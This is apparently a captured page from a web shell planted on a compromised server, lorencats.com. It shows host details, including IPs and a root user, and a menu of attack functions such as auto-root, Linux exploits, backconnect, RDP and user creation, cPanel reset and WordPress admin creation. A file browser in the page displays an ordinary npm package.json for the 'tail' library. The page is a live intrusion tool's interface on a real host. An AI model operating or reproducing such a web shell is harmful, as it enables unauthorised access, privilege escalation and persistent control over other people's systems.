Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
node-red /
node_modules /
tail /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
LICENSE
1.06
KB
-rw-r--r--
package.json
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "_from": "tail@^2.2.2", "_id": "tail@2.2.2", "_inBundle": false, "_integrity": "sha512-IlfiFF8g5sPAqIZEL3qkIFcjODBM5DqdkVUhwXdKSDYqOgXGL4Gu0Hh1UQWXdCW5gBHi52cnk9WWMowsfjF4XA==", "_location": "/node-red/tail", "_phantomChildren": {}, "_requested": { "type": "range", "registry": true, "raw": "tail@^2.2.2", "name": "tail", "escapedName": "tail", "rawSpec": "^2.2.2", "saveSpec": null, "fetchSpec": "^2.2.2" }, "_requiredBy": [ "/node-red/node-red-node-tail" ], "_resolved": "https://registry.npmjs.org/tail/-/tail-2.2.2.tgz", "_shasum": "826afd42551a3e070fcc66ba010d4caaed4728b3", "_spec": "tail@^2.2.2", "_where": "/usr/local/lib/node_modules/node-red/node_modules/node-red-node-tail", "author": { "name": "Luca Grulla", "url": "https://www.lucagrulla.com" }, "bugs": { "url": "https://github.com/lucagrulla/node-tail/issues" }, "bundleDependencies": false, "contributors": [ { "name": "Luca Grulla" }, { "name": "Tom Hall" } ], "deprecated": false, "description": "tail a file in node", "devDependencies": { "chai": "4.x", "mocha": "8.x", "nyc": "^15.1.0" }, "engines": { "node": ">= 6.0.0" }, "homepage": "https://www.lucagrulla.com/node-tail", "keywords": [ "tail", "file", "logs" ], "license": "MIT", "main": "lib/tail", "name": "tail", "repository": { "type": "git", "url": "git://github.com/lucagrulla/node-tail.git" }, "scripts": { "build": "rm -f ./lib/** && cp src/tail.js ./lib/", "coverage": "nyc npm run test", "prepare": "npm run build", "prepublishOnly": "npm run test", "test": "mocha" }, "version": "2.2.2" }
Close